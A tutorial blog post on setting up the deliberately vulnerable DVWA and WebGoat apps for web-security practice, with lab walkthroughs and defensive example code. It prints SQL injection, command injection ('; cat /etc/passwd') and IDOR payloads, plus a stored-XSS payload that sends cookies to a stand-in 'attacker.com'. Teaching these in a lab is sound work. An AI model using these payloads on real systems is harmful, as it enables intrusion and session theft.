Ethical Hacking #DVWA#WebGoat#vulnerable apps

How to Set Up DVWA and WebGoat for Safe Web Hacking Practice

Install vulnerable web apps for learning: DVWA via Docker, WebGoat setup, and guided labs for web security testing.


DVWA (Damn Vulnerable Web Application) and WebGoat are intentionally insecure web applications designed to teach security vulnerabilities. They’re invaluable for learning in a safe, legal environment. This guide covers setup and basic usage for both platforms.

Why Use Vulnerable Web Apps?

  • Legal practice: Explicitly designed for testing, no legal risk
  • Controlled environment: You own the application, no external consequences
  • Repeatable scenarios: Revert to clean state and re-exploit
  • Guided learning: Each vulnerability has explanations and hints
  • No protection: No WAF, IDS, or defenses to bypass

Perfect for beginner to intermediate learners.

Part 1: DVWA Setup

Option A: Docker (Easiest)

Docker runs DVWA in a container, completely isolated from your system.

Prerequisites:

# Install Docker
sudo apt install docker.io -y

# Add user to docker group (avoid sudo)
sudo usermod -aG docker $USER
newgrp docker

Launch DVWA:

docker run --rm -it -p 80:80 vulnerables/web-dvwa

What this does:

  • --rm: Delete container after exit
  • -it: Interactive terminal
  • -p 80:80: Map container port 80 to host port 80
  • vulnerables/web-dvwa: Official DVWA image

Expected output:

Starting Apache web server...
MySQL started successfully
DVWA ready at http://localhost/DVWA/

Access DVWA:

Open browser and navigate to http://localhost/DVWA/

Default credentials:

Username: admin
Password: password

Configure difficulty (important):

  1. Log in
  2. Click DVWA Security (bottom-left)
  3. Set PHPIDS: Disabled (for learning, no detection)
  4. Set Difficulty: Low (easiest for beginners)
  5. Click Submit

Now you’re ready to start exploiting.

Option B: VirtualBox Image

DVWA provides a pre-configured Linux VM with everything installed.

Download:

Visit https://github.com/digininja/DVWA

Download the OVA file (Open Virtualization Appliance format).

Import into VirtualBox:

# Import the OVA
VBoxManage import DVWA-*.ova

# Start the VM
VirtualBox

Select the DVWA VM and start it.

Access:

The VM displays its IP address on boot. Navigate to http://[VM-IP]/DVWA/

Credentials: admin/password

Option C: Manual Installation (For Advanced Users)

If you want full control, install manually:

  1. Apache web server
  2. PHP with MySQLi support
  3. MySQL database
  4. DVWA source code

# Install the web server, database and PHP
sudo apt install apache2 mysql-server php php-mysqli -y
sudo systemctl start apache2 mysql

# Download DVWA
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git
cd DVWA
sudo cp config/config.inc.php.dist config/config.inc.php

# Configure database
sudo mysql -u root << 'EOF'
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';
FLUSH PRIVILEGES;
EXIT;
EOF

# Set permissions
sudo chown -R www-data:www-data /var/www/html/DVWA
sudo chmod 755 /var/www/html/DVWA/config/

# Navigate to http://localhost/DVWA/setup.php and click Create Database

Part 2: WebGoat Setup

WebGoat is OWASP’s Java-based training application. More modern than DVWA but requires Java.

Pull and run:

docker run -p 8080:8080 webgoat/goatandwolf

Access:

Navigate to http://localhost:8080/WebGoat

First login:

Register a new account (any username/password you choose).

Standalone Installation

Requirements:

  • Java 11 or higher
  • Maven (for building from source)

Download:

# Download latest JAR
wget https://github.com/WebGoat/WebGoat/releases/download/v[version]/webgoat-[version].jar

# Run
java -jar webgoat-[version].jar

WebGoat starts on http://localhost:8080/WebGoat

DVWA Vulnerability Labs

Once logged in, DVWA presents vulnerabilities in order. Start with these:

1. SQL Injection (Simple)

Path: Vulnerabilities → SQL Injection

Scenario: User search by ID

User ID: 1' OR '1'='1' --

Click Submit. The injection should display all users.

Why it works: The query becomes:

SELECT * FROM users WHERE user_id='1' OR '1'='1' --'

The condition OR '1'='1' is always true, so the WHERE clause matches every row.

Escalation:

Use UNION-based injection to extract data:

1' UNION SELECT NULL, user(), version() --
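To see the mechanism and the mitigation named later in this guide (prepared statements) side by side, here is an added example that is not part of DVWA: a constructed in-memory SQLite stand-in for the users table, queried once by string concatenation (the DVWA "Low" pattern) and once with a bound parameter. The table schema and rows are assumptions for the demo.

```python
import sqlite3

# Constructed stand-in for the users table (not DVWA's real schema).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")],
    )
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    # String concatenation: the input becomes part of the SQL grammar, so a
    # quote closes the literal and everything after it is parsed as SQL.
    # (SQLite treats "--" as a comment to end of line, like the page's query.)
    query = f"SELECT first_name, last_name FROM users WHERE user_id='{user_id}'"
    return conn.execute(query).fetchall()

def lookup_prepared(conn: sqlite3.Connection, user_id: str) -> list:
    # Parameter binding: the input is always a value, never SQL. The same
    # payload is compared as one opaque string and matches nothing.
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id=?", (user_id,)
    ).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "1' OR '1'='1' --"
    print("normal input  :", lookup_vulnerable(db, "1"))
    print("vulnerable    :", lookup_vulnerable(db, payload))   # every row
    print("prepared stmt :", lookup_prepared(db, payload))     # no rows
```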

2. Command Injection

Path: Vulnerabilities → Command Injection

Scenario: Ping a host

127.0.0.1; cat /etc/passwd

The semicolon chains commands. You can execute arbitrary system commands.

Try:

127.0.0.1 && whoami
127.0.0.1 | id
127.0.0.1 `whoami`
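The fix for this class of bug is not to filter separators but to stop handing user input to a shell at all. The following added example (not DVWA code) contrasts the shell-string pattern with an argv list plus an allow-list check that accepts only a literal IP address or a syntactically valid hostname; the `ping -c 3` invocation and the hostname regex are assumptions for the demo.

```python
import ipaddress
import re
import subprocess

# RFC 1123-style hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.I)

def build_ping_vulnerable(host: str) -> str:
    # DVWA-style: input is pasted into a shell command line, so ';', '|', '&&'
    # and backticks are interpreted by the shell, not passed to ping.
    return f"ping -c 3 {host}"

def validate_host(host: str) -> str:
    # Allow-list: a parseable IP address or a well-formed hostname, nothing else.
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"rejected host: {host!r}")

def is_safe_host(host: str) -> bool:
    try:
        validate_host(host)
        return True
    except ValueError:
        return False

def build_ping_argv(host: str) -> list:
    # No shell involved: each argv element reaches ping verbatim, so shell
    # metacharacters can never become command separators.
    return ["ping", "-c", "3", validate_host(host)]

def run_ping(host: str) -> subprocess.CompletedProcess:
    # shell=False is the default; the list form is what makes this safe.
    return subprocess.run(build_ping_argv(host), capture_output=True, text=True)

if __name__ == "__main__":
    for candidate in ["127.0.0.1", "127.0.0.1; cat /etc/passwd", "127.0.0.1 `whoami`"]:
        print(f"{candidate!r:35} safe={is_safe_host(candidate)}")
```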

3. Broken Access Control

Path: Vulnerabilities → Insecure Direct Object References (IDOR)

Scenario: View user profiles by ID

URL: http://localhost/DVWA/vulnerabilities/view/?id=1
Change to: http://localhost/DVWA/vulnerabilities/view/?id=2

You can view other users’ profiles without authorization.

Escalation: Enumerate IDs to find admin profile:

?id=0, ?id=-1, ?id=999, ?id=admin

4. XSS (Cross-Site Scripting)

Path: Vulnerabilities → XSS (Stored)

Scenario: Comment section that stores input unsanitized

Name: <script>alert('XSS')</script>
Message: Test comment

Submit. Every visitor’s browser executes the script.

Try more malicious payload:

<img src=x onerror="fetch('http://attacker.com/?cookie='+document.cookie)">

This exfiltrates cookies to an attacker’s server.

5. CSRF (Cross-Site Request Forgery)

Path: Vulnerabilities → CSRF

Scenario: Change user password without proper CSRF token validation

The app might accept requests without verifying the token.
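What "verifying the token" means in practice, as an added example rather than DVWA's own code: a password-change handler that honours any request from a logged-in browser, beside one that requires a token bound to the session with an HMAC and compared in constant time. The form field names, the session ids and the in-process secret are assumptions for the demo.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret; a real deployment loads this from config.
SERVER_SECRET = secrets.token_bytes(32)

def issue_csrf_token(session_id: str) -> str:
    # Token = nonce.HMAC(secret, session_id:nonce). Because the session id is
    # mixed in, a token issued to one session cannot be used from another.
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"

def verify_csrf_token(session_id: str, token: str) -> bool:
    try:
        nonce, mac = token.split(".", 1)
    except ValueError:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)   # constant-time comparison

def change_password_vulnerable(session_id: str, form: dict) -> str:
    # DVWA "Low"-style: the browser's cookie is the only thing checked, so a
    # form auto-submitted from any other site succeeds.
    if form.get("new_password") != form.get("confirm"):
        return "mismatch"
    return "changed"

def change_password_hardened(session_id: str, form: dict) -> str:
    # Same logic, but the request must carry a token minted for this session.
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return "csrf token invalid"
    if form.get("new_password") != form.get("confirm"):
        return "mismatch"
    return "changed"

if __name__ == "__main__":
    forged = {"new_password": "pwned", "confirm": "pwned"}   # no token
    print("vulnerable:", change_password_vulnerable("sess-A", forged))
    print("hardened  :", change_password_hardened("sess-A", forged))
```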

WebGoat Lessons

WebGoat has structured lessons:

  1. Getting Started → Introduction and setup
  2. A1 Injection → SQL, OS, LDAP injection
  3. A2 Broken Authentication → Weak authentication mechanisms
  4. A3 Broken Access Control → Authorization bypasses
  5. A5 Broken Access Control → IDOR and privilege escalation
  6. A7 Cross-Site Scripting → Stored and reflected XSS
  7. Cryptography → Weak encryption, encoding vs. encryption

Each lesson has:

  • Explanation
  • Vulnerable code
  • Hands-on challenge
  • Solution walkthrough

Practical Testing Workflow

Set up both for parallel learning:

# Terminal 1: DVWA
docker run -p 80:80 vulnerables/web-dvwa

# Terminal 2: WebGoat
docker run -p 8080:8080 webgoat/goatandwolf

Testing Session Example

1. Reconnaissance:

  1. Open DVWA
  2. Log in (admin/password)
  3. Set Security to Low
  4. Navigate to SQL Injection
  5. Observe the search form and URL structure

2. Vulnerability Analysis:

  1. Try normal input: 1 → displays user #1
  2. Try quotes: 1' → error (indicates possible SQL injection)
  3. Try comment: 1' -- → different response (query structure changed)

3. Exploitation:

  1. Try: 1' OR '1'='1' -- → all users displayed
  2. Try: 999' UNION SELECT NULL, user(), version() --
  3. Document findings

4. Escalation:

  1. Extract database name: version()
  2. Extract user list: information_schema.tables
  3. Dump passwords: SELECT password FROM users

5. Report:

Document:

  • Vulnerability type: SQL Injection
  • Attack vector: User ID search field
  • Payload: 1' OR '1'='1' --
  • Impact: Full database access
  • Mitigation: Use prepared statements

Security Notes

These apps are deliberately left completely unprotected. In real scenarios:

  • Web Application Firewalls block simple payloads
  • Input validation rejects obvious injections
  • Protections (CSRF tokens, rate limiting) are common
  • Logging and monitoring detect attacks

DVWA and WebGoat disable these to teach concepts. Real exploitation is more nuanced.
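To make the "logging and monitoring" point concrete, here is an added example (not part of DVWA or WebGoat) that scans constructed Apache combined-log lines for the lab payloads used earlier in this guide. The log lines, rule names and patterns are assumptions for the demo; note that the command-injection form is a POST, whose body never appears in the access log, so those payloads need application or proxy logging to be seen.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines replaying this guide's lab requests against DVWA.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27+OR+%271%27%3D%271%27+--&Submit=Submit HTTP/1.1" 200 6120 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27+UNION+SELECT+NULL%2C+user%28%29%2C+version%28%29+--&Submit=Submit HTTP/1.1" 200 6010 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:01:02 +0000] "POST /DVWA/vulnerabilities/exec/ HTTP/1.1" 200 3312 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:02:30 +0000] "GET /DVWA/vulnerabilities/xss_s/ HTTP/1.1" 200 3020 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:03:00 +0000] "GET /DVWA/vulnerabilities/view/?id=%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 3020 "-" "Mozilla/5.0"
"""

# Request line inside the quotes: method, path (with query string), protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+"')

# Signatures are evaluated on the URL-decoded path; real deployments would
# also normalise case, double-encoding and comments before matching.
SIGNATURES = [
    ("sqli-tautology", re.compile(r"'\s*or\s*'?\w*'?\s*=", re.I)),
    ("sqli-union", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("xss-tag", re.compile(r"<\s*(?:script|img|svg|iframe)\b", re.I)),
    ("cmd-separator", re.compile(r"[;|`]|&&")),
]

def scan_log(log_text: str) -> list:
    # Returns (line number, rule name, decoded path) for every rule that fires.
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        decoded = unquote_plus(m.group("path"))   # %27 -> ', + -> space
        for name, pattern in SIGNATURES:
            if pattern.search(decoded):
                hits.append((lineno, name, decoded))
    return hits

if __name__ == "__main__":
    for lineno, rule, path in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {rule:15} {path}")
```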

Progression Path

  1. Start with DVWA (Low): Understand basic vulnerabilities
  2. Move to DVWA (Medium): Evade simple protections
  3. Try DVWA (High): Advanced techniques required
  4. WebGoat lessons: Structured learning
  5. Real challenges: HackTheBox, TryHackMe, CTF competitions

Resetting Databases

If you break something or want a clean slate:

DVWA (Docker):

# Stop and remove container
docker stop <container_id>
docker rm <container_id>

# Run fresh
docker run --rm -it -p 80:80 vulnerables/web-dvwa

DVWA (Standalone):

# Re-run database setup
# Navigate to /setup.php and click "Create Database"

WebGoat (Docker):

Same as DVWA — remove container and re-run.

Troubleshooting

Can’t access DVWA:

# Check Docker is running
sudo systemctl status docker

# Check port 80 is available
sudo lsof -i :80

# Try different port
docker run -p 8000:80 vulnerables/web-dvwa
# Access at http://localhost:8000/DVWA/

WebGoat won’t start:

# Ensure Java is installed
java -version

# Check port 8080
lsof -i :8080

# Increase memory if needed
docker run -p 8080:8080 -e JAVA_OPTS="-Xmx512m" webgoat/goatandwolf

Database connection errors:

DVWA database sometimes needs manual setup:

# Inside DVWA, navigate to /setup.php
# Click "Create/Reset Database"

Conclusion

DVWA and WebGoat are your safe playgrounds for learning web security. They remove legal and technical barriers, letting you focus on understanding vulnerabilities.

Spend time here before moving to real targets. Every major web attack type is represented:

  • Injection flaws
  • Broken authentication
  • Access control failures
  • Sensitive data exposure
  • XML external entity (XXE)
  • Broken access control
  • Security misconfiguration
  • XSS and CSRF
  • Insecure deserialization

Master these on intentionally vulnerable apps, and you’ll recognize them in the wild.

Use DVWA and WebGoat to learn. Use that knowledge responsibly on authorized targets only.

#ethical hacking #Docker #web hacking practice #vulnerable apps #WebGoat #DVWA